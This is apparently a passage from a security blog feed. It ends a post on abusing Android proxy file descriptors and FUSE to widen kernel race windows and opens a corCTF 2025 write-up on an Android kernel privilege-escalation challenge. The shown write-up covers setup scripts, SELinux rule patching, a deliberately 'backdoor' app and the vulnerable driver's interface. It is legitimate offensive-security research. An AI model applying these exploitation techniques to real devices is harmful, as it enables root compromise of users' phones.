<p>Once the application is loaded, the <code class="language-plaintext highlighter-rouge">onCreate()</code> method is invoked [2], so it can be considered the entry point of the application. Next, we define several mutable variables to maintain state within a Composable by keywork <code class="language-plaintext highlighter-rouge">remember</code> [3].</p>

<p>After that, we use <code class="language-plaintext highlighter-rouge">LaunchedEffect(Unit)</code> [4] and <code class="language-plaintext highlighter-rouge">DisposableEffect(Unit)</code> [5] to define the prologue and epilogue handlers when entering and leaving the Composition.</p>

<p>The prologue handler <strong>creates a thread <code class="language-plaintext highlighter-rouge">"ProxyFDCallbacks"</code> as a proxy fd handler</strong> [6], since the proxy fd must be managed on a separate thread. Then, the <code class="language-plaintext highlighter-rouge">getSystemService()</code> function [7] is called to obtain the <code class="language-plaintext highlighter-rouge">StorageManager</code> system service. Using this handle, we can <strong>communicate with the storage manager service</strong> and request it to create a proxy fd for us by <strong>calling the <code class="language-plaintext highlighter-rouge">openProxyFileDescriptor()</code> function</strong> [8].</p>

<p>This function takes three parameters: <strong>opened file mode</strong>, <strong>callback object</strong> and <strong>handling thread</strong>. Since the file mode is set to <code class="language-plaintext highlighter-rouge">ParcelFileDescriptor.MODE_READ_ONLY</code>, we can only read the file but cannot write to it. The <code class="language-plaintext highlighter-rouge">FuseCallback()</code> [9] class extends the callback handler to provide custom behavior.</p>

<p>In the <code class="language-plaintext highlighter-rouge">onRead()</code> handler, we <strong>insert a sleep call</strong> [10] before returning the read size. As a result, when <code class="language-plaintext highlighter-rouge">mmapfuse()</code> [11] is invoked, the memory copy operation — <strong>specifically <code class="language-plaintext highlighter-rouge">memcpy(buf, ptr, 0x10)</code></strong> — on the mapped FUSE fd <strong>will block the read access for two seconds</strong>.</p>

<p>Later, the output of the function call is displayed on the screen by invoking <code class="language-plaintext highlighter-rouge">Text()</code> [12], which is expected to look like:</p>

<p><img src="/assets/image-20250924143618063.png" alt="image-20250924143618063" style="display: block; margin-left: auto; margin-right: auto; zoom:50%;" /></p>

<p>Finally, the epilogue closes the FUSE fd and releases the <code class="language-plaintext highlighter-rouge">"ProxyFDCallbacks"</code> thread.</p>

<h2 id="3-internal">3. Internal</h2>

<p>According to the <a href="https://developer.android.com/reference/android/content/Context#getSystemService(java.lang.String)">API documentation</a>, we can call <code class="language-plaintext highlighter-rouge">getSystemService()</code> to obtain a handle to a system-level service by name. This allows us to retrieve a <code class="language-plaintext highlighter-rouge">StorageManager</code> instance and access its predefined handlers.</p>

<div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">public</span> <span class="kd">abstract</span> <span class="nc">Object</span> <span class="nf">getSystemService</span> <span class="o">(</span><span class="nc">String</span> <span class="n">name</span><span class="o">)</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">StorageManager</code> class provides the method <code class="language-plaintext highlighter-rouge">openProxyFileDescriptor()</code>, which is implemented in <a href="https://cs.android.com/android/platform/superproject/main/+/main:frameworks/base/core/java/android/os/storage/StorageManager.java;l=2019?q=registerStorageVolumeCallback&amp;ss=android">android.os.storage.StorageManager</a>.</p>

<div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">@SystemService</span><span class="o">(</span><span class="nc">Context</span><span class="o">.</span><span class="na">STORAGE_SERVICE</span><span class="o">)</span>
<span class="kd">public</span> <span class="kd">class</span> <span class="nc">StorageManager</span> <span class="o">{</span>
    <span class="c1">// [...]</span>
    
    <span class="kd">public</span> <span class="nd">@NonNull</span> <span class="nc">ParcelFileDescriptor</span> <span class="nf">openProxyFileDescriptor</span><span class="o">(</span>
            <span class="kt">int</span> <span class="n">mode</span><span class="o">,</span> <span class="nc">ProxyFileDescriptorCallback</span> <span class="n">callback</span><span class="o">,</span> <span class="nc">Handler</span> <span class="n">handler</span><span class="o">)</span>
                    <span class="kd">throws</span> <span class="nc">IOException</span> <span class="o">{</span>
        <span class="nc">Preconditions</span><span class="o">.</span><span class="na">checkNotNull</span><span class="o">(</span><span class="n">handler</span><span class="o">);</span>
        <span class="k">return</span> <span class="nf">openProxyFileDescriptor</span><span class="o">(</span><span class="n">mode</span><span class="o">,</span> <span class="n">callback</span><span class="o">,</span> <span class="n">handler</span><span class="o">,</span> <span class="kc">null</span><span class="o">);</span>
    <span class="o">}</span>
    
    <span class="c1">// [...]</span>
<span class="o">}</span>
</code></pre></div></div>

<p>Internally, the method <code class="language-plaintext highlighter-rouge">mountProxyFileDescriptorBridge()</code> [1] is invoked to obtain an <code class="language-plaintext highlighter-rouge">AppFuseMount</code> object and enter the FUSE app loop to handle file operations.</p>

<div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">public</span> <span class="nd">@NonNull</span> <span class="nc">ParcelFileDescriptor</span> <span class="nf">openProxyFileDescriptor</span><span class="o">(</span>
        <span class="kt">int</span> <span class="n">mode</span><span class="o">,</span> <span class="nc">ProxyFileDescriptorCallback</span> <span class="n">callback</span><span class="o">,</span> <span class="nc">Handler</span> <span class="n">handler</span><span class="o">,</span> <span class="nc">ThreadFactory</span> <span class="n">factory</span><span class="o">)</span>
                <span class="kd">throws</span> <span class="nc">IOException</span> <span class="o">{</span>
    <span class="c1">// [...]</span>
    <span class="k">while</span> <span class="o">(</span><span class="kc">true</span><span class="o">)</span> <span class="o">{</span>
        <span class="k">try</span> <span class="o">{</span>
            <span class="kd">synchronized</span> <span class="o">(</span><span class="n">mFuseAppLoopLock</span><span class="o">)</span> <span class="o">{</span>
                <span class="kt">boolean</span> <span class="n">newlyCreated</span> <span class="o">=</span> <span class="kc">false</span><span class="o">;</span>
                <span class="k">if</span> <span class="o">(</span><span class="n">mFuseAppLoop</span> <span class="o">==</span> <span class="kc">null</span><span class="o">)</span> <span class="o">{</span>
                    <span class="kd">final</span> <span class="nc">AppFuseMount</span> <span class="n">mount</span> <span class="o">=</span> <span class="n">mStorageManager</span><span class="o">.</span><span class="na">mountProxyFileDescriptorBridge</span><span class="o">();</span> <span class="c1">// [1]</span>
                <span class="o">}</span>
                <span class="c1">// [...]</span>
                <span class="n">mFuseAppLoop</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">FuseAppLoop</span><span class="o">(</span><span class="n">mount</span><span class="o">.</span><span class="na">mountPointId</span><span class="o">,</span> <span class="n">mount</span><span class="o">.</span><span class="na">fd</span><span class="o">,</span> <span class="n">factory</span><span class="o">);</span>
                <span class="c1">// [...]</span>
            <span class="o">}</span>
            <span class="c1">// [...]</span>
        <span class="o">}</span>
    <span class="o">}</span>
    <span class="c1">// [...]</span>
<span class="o">}</span>
</code></pre></div></div>

<p>This call corresponds to a Binder transaction in <code class="language-plaintext highlighter-rouge">IStorageManager</code>, as defined in <a href="https://cs.android.com/android/platform/superproject/main/+/main:frameworks/base/core/java/android/os/storage/IStorageManager.aidl?q=mountProxyFileDescriptorBridge&amp;ss=android%2Fplatform%2Fsuperproject%2Fmain">IStorageManager.aidl</a>. The <code class="language-plaintext highlighter-rouge">IStorageManager</code> service <strong>runs inside <code class="language-plaintext highlighter-rouge">system_server</code></strong>, which hosts almost all of the <strong>core system services</strong>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>interface IStorageManager {
    // [...]
    AppFuseMount mountProxyFileDescriptorBridge() = 73;
    // [...]
}
</code></pre></div></div>

<p>We can verify this information using the <code class="language-plaintext highlighter-rouge">service</code> and <code class="language-plaintext highlighter-rouge">ps</code> shell commands.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>akita:/ # service list | grep mount
242	mount: [android.os.storage.IStorageManager]

akita:/ # ps -A | grep -i system_server
system        1436   903   23594364 775776 do_epoll_wait       0 S system_server
</code></pre></div></div>

<p>The method <code class="language-plaintext highlighter-rouge">mountProxyFileDescriptorBridge()</code> is implemented in <a href="https://cs.android.com/android/platform/superproject/main/+/main:frameworks/base/services/core/java/com/android/server/StorageManagerService.java;l=3754?q=mountProxyFileDescriptorBridge&amp;ss=android%2Fplatform%2Fsuperproject%2Fmain">StorageManagerService.java</a>, where it creates an <code class="language-plaintext highlighter-rouge">AppFuseMountScope</code> object [2].</p>

<div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">class</span> <span class="nc">StorageManagerService</span> <span class="kd">extends</span> <span class="nc">IStorageManager</span><span class="o">.</span><span class="na">Stub</span>
        <span class="kd">implements</span> <span class="nc">Watchdog</span><span class="o">.</span><span class="na">Monitor</span><span class="o">,</span> <span class="nc">ScreenObserver</span> <span class="o">{</span>
    <span class="c1">// [...]</span>
    
    <span class="nd">@Override</span>
    <span class="kd">public</span> <span class="nd">@Nullable</span> <span class="nc">AppFuseMount</span> <span class="nf">mountProxyFileDescriptorBridge</span><span class="o">()</span> <span class="o">{</span>
        <span class="c1">// [...]</span>
        <span class="k">while</span> <span class="o">(</span><span class="kc">true</span><span class="o">)</span> <span class="o">{</span>
            <span class="c1">// [...]</span>
            <span class="k">try</span> <span class="o">{</span>
                <span class="k">return</span> <span class="k">new</span> <span class="nf">AppFuseMount</span><span class="o">(</span>
                    <span class="n">name</span><span class="o">,</span> <span class="n">mAppFuseBridge</span><span class="o">.</span><span class="na">addBridge</span><span class="o">(</span><span class="k">new</span> <span class="nc">AppFuseMountScope</span><span class="o">(</span><span class="n">uid</span><span class="o">,</span> <span class="n">name</span><span class="o">)));</span> <span class="c1">// [2]</span>
            <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nc">FuseUnavailableMountException</span> <span class="n">e</span><span class="o">)</span> <span class="o">{</span>
                <span class="c1">// [...]</span>
            <span class="o">}</span>
        <span class="o">}</span>
    <span class="o">}</span>

    <span class="c1">// [...]</span>
<span class="o">}</span>
</code></pre></div></div>

<p>The <code class="language-plaintext highlighter-rouge">AppFuseMountScope</code> class is also defined in <a href="https://cs.android.com/android/platform/superproject/main/+/main:frameworks/base/services/core/java/com/android/server/StorageManagerService.java;l=3693?q=AppFuseMountScope&amp;ss=android%2Fplatform%2Fsuperproject%2Fmain">StorageManagerService.java</a>. Its <code class="language-plaintext highlighter-rouge">open()</code> method eventually calls <code class="language-plaintext highlighter-rouge">mVold.mountAppFuse()</code> [3] to obtain the FUSE fd.</p>

<div class="language-java highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kd">class</span> <span class="nc">AppFuseMountScope</span> <span class="kd">extends</span> <span class="nc">AppFuseBridge</span><span class="o">.</span><span class="na">MountScope</span> <span class="o">{</span>
        <span class="kd">private</span> <span class="kt">boolean</span> <span class="n">mMounted</span> <span class="o">=</span> <span class="kc">false</span><span class="o">;</span>

    <span class="kd">public</span> <span class="nf">AppFuseMountScope</span><span class="o">(</span><span class="kt">int</span> <span class="n">uid</span><span class="o">,</span> <span class="kt">int</span> <span class="n">mountId</span><span class="o">)</span> <span class="o">{</span>
        <span class="kd">super</span><span class="o">(</span><span class="n">uid</span><span class="o">,</span> <span class="n">mountId</span><span class="o">);</span>
    <span class="o">}</span>

    <span class="nd">@Override</span>
    <span class="kd">public</span> <span class="nc">ParcelFileDescriptor</span> <span class="nf">open</span><span class="o">()</span> <span class="kd">throws</span> <span class="nc">AppFuseMountException</span> <span class="o">{</span>
        <span class="n">extendWatchdogTimeout</span><span class="o">(</span><span class="s">"#open might be slow"</span><span class="o">);</span>
        <span class="k">try</span> <span class="o">{</span>
            <span class="kd">final</span> <span class="nc">FileDescriptor</span> <span class="n">fd</span> <span class="o">=</span> <span class="n">mVold</span><span class="o">.</span><span class="na">mountAppFuse</span><span class="o">(</span><span class="n">uid</span><span class="o">,</span> <span class="n">mountId</span><span class="o">);</span> <span class="c1">// [3]</span>
            <span class="n">mMounted</span> <span class="o">=</span> <span class="kc">true</span><span class="o">;</span>
            <span class="k">return</span> <span class="k">new</span> <span class="nf">ParcelFileDescriptor</span><span class="o">(</span><span class="n">fd</span><span class="o">);</span>
        <span class="o">}</span> <span class="k">catch</span> <span class="o">(</span><span class="nc">Exception</span> <span class="n">e</span><span class="o">)</span> <span class="o">{</span>
            <span class="k">throw</span> <span class="k">new</span> <span class="nf">AppFuseMountException</span><span class="o">(</span><span class="s">"Failed to mount"</span><span class="o">,</span> <span class="n">e</span><span class="o">);</span>
        <span class="o">}</span>
    <span class="o">}</span>
    <span class="c1">// [...]</span>
<span class="o">}</span>
</code></pre></div></div>

<p>The method <code class="language-plaintext highlighter-rouge">mountAppFuse()</code> is a Binder call exposed by the Vold (Volume Daemon) process, defined in <a href="https://cs.android.com/android/platform/superproject/main/+/main:system/vold/binder/android/os/IVold.aidl;l=80?q=mountAppFuse&amp;ss=android%2Fplatform%2Fsuperproject%2Fmain">IVold.aidl</a>.</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>@SensitiveData
interface IVold {
    FileDescriptor mountAppFuse(int uid, int mountId);
}
</code></pre></div></div>

<p>Vold runs as a dedicated process, which is responsible for handling the FUSE open and mount operations internally:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>akita:/ # service list | grep -i vold
# [...]
368	vold: [android.os.IVold]

akita:/ # ps -A | grep -i vold
root           559     1   11025252   9996 binder_thread_read  0 S vold
</code></pre></div></div>

<p>Finally, within the C++ function <a href="https://cs.android.com/android/platform/superproject/main/+/main:system/vold/AppFuseUtil.cpp;l=105?q=mountAppFuse&amp;ss=android%2Fplatform%2Fsuperproject%2Fmain"><code class="language-plaintext highlighter-rouge">MountAppFuse()</code></a>, the mount path is defined [4], the <strong><code class="language-plaintext highlighter-rouge">"/dev/fuse"</code></strong> file is opened [5], and the mount operation [6] is performed.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">int</span> <span class="nf">MountAppFuse</span><span class="p">(</span><span class="n">uid_t</span> <span class="n">uid</span><span class="p">,</span> <span class="kt">int</span> <span class="n">mountId</span><span class="p">,</span> <span class="n">android</span><span class="o">::</span><span class="n">base</span><span class="o">::</span><span class="n">unique_fd</span><span class="o">*</span> <span class="n">device_fd</span><span class="p">)</span> <span class="p">{</span>
    <span class="n">std</span><span class="o">::</span><span class="n">string</span> <span class="n">name</span> <span class="o">=</span> <span class="n">std</span><span class="o">::</span><span class="n">to_string</span><span class="p">(</span><span class="n">mountId</span><span class="p">);</span>

    <span class="c1">// [...]</span>
    <span class="n">std</span><span class="o">::</span><span class="n">string</span> <span class="n">path</span><span class="p">;</span>
    <span class="c1">// [...]</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">GetMountPath</span><span class="p">(</span><span class="n">uid</span><span class="p">,</span> <span class="n">name</span><span class="p">,</span> <span class="o">&amp;</span><span class="n">path</span><span class="p">)</span> <span class="o">!=</span> <span class="n">android</span><span class="o">::</span><span class="n">OK</span><span class="p">)</span> <span class="p">{</span> <span class="c1">// [4]</span>
        <span class="n">LOG</span><span class="p">(</span><span class="n">ERROR</span><span class="p">)</span> <span class="o">&lt;&lt;</span> <span class="s">"Invalid mount point name"</span><span class="p">;</span>
        <span class="k">return</span> <span class="o">-</span><span class="mi">1</span><span class="p">;</span>
    <span class="p">}</span>
    <span class="c1">// [...]</span>
    <span class="n">device_fd</span><span class="o">-&gt;</span><span class="n">reset</span><span class="p">(</span><span class="n">open</span><span class="p">(</span><span class="s">"/dev/fuse"</span><span class="p">,</span> <span class="n">O_RDWR</span><span class="p">));</span> <span class="c1">// [5]</span>
    <span class="c1">// [...]</span>
    <span class="k">return</span> <span class="n">RunCommand</span><span class="p">(</span><span class="s">"mount"</span><span class="p">,</span> <span class="n">uid</span><span class="p">,</span> <span class="n">path</span><span class="p">,</span> <span class="n">device_fd</span><span class="o">-&gt;</span><span class="n">get</span><span class="p">());</span> <span class="c1">// [6]</span>
<span class="p">}</span>
</code></pre></div></div>]]></content><author><name></name></author><category term="Android" /><summary type="html"><![CDATA[The talk KernelGP: Racing Against the Android Kernel at OffensiveCon 2025 demonstrates four techniques to leverage Android’s internal design to extend the race window during kernel exploitation. In this post, I will walk through my exploration of the first method — the proxy file descriptor — and explain how I implemented it. I’ll also share some side notes on writing an Android app.]]></summary></entry><entry><title type="html">corCTF 2025 - corphone</title><link href="https://u1f383.github.io/android/2025/09/08/corCTF-2025-corphone.html" rel="alternate" type="text/html" title="corCTF 2025 - corphone" /><published>2025-09-08T00:00:00+00:00</published><updated>2025-09-08T00:00:00+00:00</updated><id>https://u1f383.github.io/android/2025/09/08/corCTF-2025-corphone</id><content type="html" xml:base="https://u1f383.github.io/android/2025/09/08/corCTF-2025-corphone.html"><![CDATA[<p>Last week, I participated in corCTF as part of team Billy (simply because my friend Billy (@st424204) was also playing it in his free time) and solved an Android pwn challenge, <strong>corphone</strong>. Although I had some prior research experience with Android, this was the first time I successfully achieved LPE on it!</p>

<p>This post is not only a write-up for the challenge but also includes some notes on Android exploitation. Hope you find it helpful!</p>

<p>By the way, you can also refer to <a href="https://github.com/0xdevil/corphone/tree/main">this GitHub repo</a> for the author’s version of the exploitation, which should be more stable and understandable than mine.</p>

<p>Thanks to the author, devil (d3vil), for creating this awesome challenge, and to Billy for playing it with me 🙂.</p>

<h2 id="1-introduction">1. Introduction</h2>

<p>The attachment <strong><code class="language-plaintext highlighter-rouge">INSTRUCTIONS.md</code></strong> provides clear steps for setting up the environment. You can follow it to get everything ready quickly. Out of curiosity, I also analyzed the setup process. If you are not interested in how this system was built, you may skip this section.</p>

<p>After unpacking <code class="language-plaintext highlighter-rouge">corphone-local.tar.gz</code>, the output directory <code class="language-plaintext highlighter-rouge">local-docker</code> will look like this:</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.
├── build-docker-image.sh
├── corav.diff
├── corphone
├── Dockerfile
├── exp2sc.py
├── files
│   ├── cuttlefish-packages
│   │   ├── cuttlefish-base_1.12.0_amd64.deb
│   │   └── cuttlefish-user_1.12.0_amd64.deb
│   ├── image
│   │   ├── bd.apk
│   │   ├── corctl
│   │   ├── magiskpolicy
│   │   └── mm.apk
│   └── kernel
│       ├── bzImage
│       └── initramfs.img
├── notabackdoor2-apk
│   └── notabackdoor2.zip
└── System.map
</code></pre></div></div>
<ul>
  <li><code class="language-plaintext highlighter-rouge">build-docker-image.sh</code>, <code class="language-plaintext highlighter-rouge">corphone</code>, <code class="language-plaintext highlighter-rouge">Dockerfile</code>: Scripts for setting up the environment.</li>
  <li><code class="language-plaintext highlighter-rouge">corav.diff</code>: An Android kernel patch that implements a vulnerable built-in driver.</li>
  <li><code class="language-plaintext highlighter-rouge">notabackdoor2-apk</code>: A backdoor application used for debugging and uploading exploits. This application mimics an untrusted real-world app.</li>
  <li><code class="language-plaintext highlighter-rouge">exp2sc.py</code>: Converts a static binary to shellcode, which is later executed by the backdoor application.</li>
  <li><code class="language-plaintext highlighter-rouge">files/cuttlefish-packages</code>: <a href="https://github.com/google/android-cuttlefish">Cuttlefish</a>, a Google tool for running Android Virtual Devices (AVD).</li>
  <li><code class="language-plaintext highlighter-rouge">files/image</code>: <a href="https://github.com/topjohnwu/Magisk">Magisk</a>, a rooting tool for Android. Its utility <code class="language-plaintext highlighter-rouge">magiskpolicy</code> can patch SELinux policies at runtime.
    <ul>
      <li><code class="language-plaintext highlighter-rouge">bd.apk</code> is the backdoor app, while <code class="language-plaintext highlighter-rouge">mm.apk</code> is “Mattermost,” a chatroom service.</li>
    </ul>
  </li>
  <li><code class="language-plaintext highlighter-rouge">files/kernel</code>: The compiled kernel and initramfs.</li>
</ul>

<p>The script <code class="language-plaintext highlighter-rouge">build-docker-image.sh</code> downloads two files: <code class="language-plaintext highlighter-rouge">android-img.zip</code> and <code class="language-plaintext highlighter-rouge">cvd-host_package.tar.gz</code>.</p>

<p>The former contains files required for booting Android (unclear if they are auto-generated or manually packaged):</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>.
├── android-info.txt
├── boot.img
├── fastboot-info.txt
├── init_boot.img
├── super.img
├── userdata.img
├── vbmeta.img
├── vbmeta_system_dlkm.img
├── vbmeta_system.img
├── vbmeta_vendor_dlkm.img
└── vendor_boot.img
</code></pre></div></div>

<p>The latter contains host-side components used by Cuttlefish.</p>

<p>Finally, a Docker image is built, running Cuttlefish on Debian 12.</p>

<div class="language-Dockerfile highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c"># [...]</span>
<span class="k">COPY</span><span class="s"> ./files/cuttlefish-packages/cuttlefish-*.deb /root/debian/</span>
<span class="k">RUN </span>apt <span class="nb">install</span> <span class="nt">-y</span> <span class="nt">--no-install-recommends</span> <span class="nt">-f</span> <span class="se">\
</span>    /root/debian/cuttlefish-base_<span class="k">*</span>.deb <span class="se">\
</span>    /root/debian/cuttlefish-user_<span class="k">*</span>.deb
<span class="c"># [...]</span>
</code></pre></div></div>

<p>After building, we can use the <code class="language-plaintext highlighter-rouge">corphone</code> script to start a Docker container. The command will then be passed through to the <code class="language-plaintext highlighter-rouge">corctl</code> script inside the container.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>run_cuttlefish<span class="o">()</span> <span class="o">{</span>
    <span class="nb">local </span><span class="nv">cmd</span><span class="o">=</span><span class="s2">"</span><span class="nv">$1</span><span class="s2">"</span>
    docker run <span class="nt">--rm</span> <span class="nt">-it</span> <span class="se">\</span>
        <span class="nt">--name</span> corphone <span class="se">\</span>
        <span class="nt">--network</span> bridge <span class="se">\</span>
        <span class="nt">--privileged</span> <span class="se">\</span>
        <span class="nt">-v</span> <span class="s2">"</span><span class="si">$(</span><span class="nb">pwd</span><span class="si">)</span><span class="s2">/volumes/kernel:/root/kernel:ro"</span> <span class="se">\</span>
        <span class="nt">-v</span> <span class="s2">"</span><span class="si">$(</span><span class="nb">pwd</span><span class="si">)</span><span class="s2">/volumes/image:/root/image:rw"</span> <span class="se">\</span>
        <span class="nt">-v</span> <span class="s2">"</span><span class="si">$(</span><span class="nb">pwd</span><span class="si">)</span><span class="s2">/volumes/instance:/root/instance:rw"</span> <span class="se">\</span>
        <span class="nt">-v</span> <span class="s2">"</span><span class="si">$(</span><span class="nb">pwd</span><span class="si">)</span><span class="s2">/volumes/tmp:/tmp:rw"</span> <span class="se">\</span>
        cuttlefish:latest <span class="se">\</span>
        /root/image/corctl <span class="s2">"</span><span class="nv">$cmd</span><span class="s2">"</span>
<span class="o">}</span>
</code></pre></div></div>

<p>First, we execute <code class="language-plaintext highlighter-rouge">./corphone create</code> to create an instance. This triggers the <code class="language-plaintext highlighter-rouge">create_instance()</code> function.</p>

<p>Note: I removed some commands and expanded certain variables/functions for clarity.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">create_instance</span><span class="p">()</span> <span class="p">{</span>

    <span class="n">service</span> <span class="n">cuttlefish</span><span class="o">-</span><span class="n">host</span><span class="o">-</span><span class="n">resources</span> <span class="n">start</span>
    <span class="n">service</span> <span class="n">cuttlefish</span><span class="o">-</span><span class="n">operator</span> <span class="n">status</span>

    <span class="n">cvd</span> <span class="n">create</span> \
        <span class="o">--</span><span class="n">num_instances</span><span class="o">=</span><span class="mi">1</span> \
        <span class="o">--</span><span class="n">base_instance_num</span><span class="o">=</span><span class="mi">1</span> \
        <span class="o">--</span><span class="n">host_path</span> <span class="o">/</span><span class="n">root</span><span class="o">/</span><span class="n">image</span> \
        <span class="o">--</span><span class="n">product_path</span> <span class="o">/</span><span class="n">root</span><span class="o">/</span><span class="n">image</span> \
        <span class="o">-</span><span class="n">instance_dir</span> <span class="o">/</span><span class="n">root</span><span class="o">/</span><span class="n">instance</span> \
        <span class="o">-</span><span class="n">initramfs_path</span> <span class="o">/</span><span class="n">root</span><span class="o">/</span><span class="n">kernel</span><span class="o">/</span><span class="n">initramfs</span><span class="p">.</span><span class="n">img</span> \
        <span class="o">-</span><span class="n">kernel_path</span> <span class="o">/</span><span class="n">root</span><span class="o">/</span><span class="n">kernel</span><span class="o">/</span><span class="n">bzImage</span> \
        <span class="o">-</span><span class="n">report_anonymous_usage_stats</span><span class="o">=</span><span class="n">n</span> \
        <span class="o">-</span><span class="n">cpus</span><span class="o">=</span><span class="mi">4</span> \
        <span class="o">-</span><span class="n">memory_mb</span><span class="o">=</span><span class="mi">4096</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Next, the instance is set up. This includes patching SELinux rules so the target device can be accessed by the untrusted application, installing applications, and forwarding the backdoor and ADB ports.</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>corphone_setup<span class="o">()</span> <span class="o">{</span>
    adb connect 127.0.0.1:<span class="nv">$ADB_PORT</span>

    <span class="c">####### allow_corav_access() #######</span>
    adb shell su 0 /system/bin/chmod 0644 /dev/corav
    adb push /root/image/magiskpolicy /data/local/tmp/m <span class="o">&gt;</span>/dev/null 2&gt;&amp;1
    adb shell <span class="s1">'su 0 chcon u:object_r:corav_device:s0 /dev/corav'</span> <span class="o">&gt;</span>/dev/null 2&gt;&amp;1
    adb shell <span class="s1">'su 0 /data/local/tmp/m --live "type corav_device"'</span>
    adb shell <span class="s1">'su 0 /data/local/tmp/m --live "allow untrusted_app corav_device chr_file open"'</span>
    adb shell <span class="s1">'su 0 /data/local/tmp/m --live "allow untrusted_app corav_device chr_file read"'</span>
    adb shell <span class="s1">'su 0 /data/local/tmp/m --live "allow untrusted_app corav_device chr_file ioctl"'</span>
    adb shell <span class="s1">'su 0 /data/local/tmp/m --print-rules | grep corav || echo Error'</span>
    adb shell <span class="s1">'su 0 rm /data/local/tmp/m'</span>

    <span class="c">####### install apk #######</span>
    <span class="c">### am: Activity Manager, pm: Package Manager</span>
    adb <span class="nb">install</span> /root/image/bd.apk
    adb shell am force-stop com.example.notabackdoor2
    adb shell pm grant com.example.notabackdoor2 android.permission.ACCESS_COARSE_LOCATION
    adb shell pm grant com.example.notabackdoor2 android.permission.ACCESS_BACKGROUND_LOCATION
    adb shell am start <span class="nt">-n</span> com.example.notabackdoor2/com.example.notabackdoor2.MainActivity

    <span class="c"># [...]</span>

    <span class="c">####### forward network #######</span>
    <span class="c">### adb</span>
    socat TCP-LISTEN:6666,fork,reuseaddr,bind<span class="o">=</span>0.0.0.0 TCP:127.0.0.1:6520 &amp;
    
    <span class="c">### apk</span>
    adb <span class="nt">-a</span> forward tcp:6969 tcp:6969 <span class="o">&gt;</span> /dev/null 2&gt;&amp;1
    socat TCP-LISTEN:1337,fork,reuseaddr,bind<span class="o">=</span>0.0.0.0 TCP:127.0.0.1:6969 <span class="c"># become frontend process</span>
<span class="o">}</span>
</code></pre></div></div>

<p>In the end, we can connect to <code class="language-plaintext highlighter-rouge">container-ip:1337</code> from the host to interact with the backdoor application:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aaa@aaa:~<span class="nv">$ </span>nc 172.17.0.2 1337
 | Backdoor | Say the magic word:
</code></pre></div></div>

<p>We can also connect to <code class="language-plaintext highlighter-rouge">container-ip:6666</code> to obtain a shell:</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>aaa@aaa:~<span class="nv">$ </span>adb connect 172.17.0.2:6666
connected to 172.17.0.2:6666

aaa@aaa:~<span class="nv">$ </span>adb shell
vsoc_x86_64_only:/ <span class="err">$</span>
</code></pre></div></div>

<h2 id="2-challenge">2. Challenge</h2>

<h3 id="21-analyze">2.1. Analyze</h3>

<p>The <code class="language-plaintext highlighter-rouge">corav.diff</code> patch implements an access vector device at <code class="language-plaintext highlighter-rouge">/dev/corav</code>.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="k">struct</span> <span class="n">miscdevice</span> <span class="n">corav_misc</span> <span class="o">=</span> <span class="p">{</span>
    <span class="p">.</span><span class="n">minor</span> <span class="o">=</span> <span class="n">MISC_DYNAMIC_MINOR</span><span class="p">,</span>
    <span class="p">.</span><span class="n">name</span>  <span class="o">=</span> <span class="s">"corav"</span><span class="p">,</span>
    <span class="p">.</span><span class="n">fops</span>  <span class="o">=</span> <span class="o">&amp;</span><span class="n">corav_fops</span><span class="p">,</span>
    <span class="p">.</span><span class="n">mode</span>  <span class="o">=</span> <span class="mo">0644</span><span class="p">,</span>
<span class="p">};</span>

<span class="k">static</span> <span class="k">const</span> <span class="k">struct</span> <span class="n">file_operations</span> <span class="n">corav_fops</span> <span class="o">=</span> <span class="p">{</span>
    <span class="p">.</span><span class="n">owner</span>          <span class="o">=</span> <span class="n">THIS_MODULE</span><span class="p">,</span>
    <span class="p">.</span><span class="n">unlocked_ioctl</span> <span class="o">=</span> <span class="n">corav_ioctl</span><span class="p">,</span>
<span class="p">};</span>
</code></pre></div></div>

<p>The ioctl handler expects the user to pass a <code class="language-plaintext highlighter-rouge">struct corav_user_entry</code> object as a parameter. This structure contains a file signature, a set of flags (<code class="language-plaintext highlighter-rouge">risk</code>, <code class="language-plaintext highlighter-rouge">root_only</code>), and a file path.</p>

<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">struct</span> <span class="n">corav_user_entry</span> <span class="p">{</span>
    <span class="kt">uint64_t</span> <span class="n">sig</span><span class="p">;</span>
    <span class="k">enum</span> <span class="n">corav_risk</span> <span class="n">risk</span><span class="p">;</span>
    <span class="n">bool</span> <span class="n">root_only</span><span class="p">;</span>
    <span class="kt">char</span> <span class="n">path</span><span class="p">[</span><span class="n">CORAV_MAX_PATH_SIZE</span><span class="p">];</span>
<span class="p">};</span>
</code></pre></div></div>

<p>There are three commands: <code class="language-plaintext highlighter-rouge">CORCTL_INSERT</code>, <code class="language-plaintext highlighter-rouge">CORCTL_UPDATE</code>, and <code class="language-plaintext highlighter-rouge">CORCTL_DELETE</code>.</p>

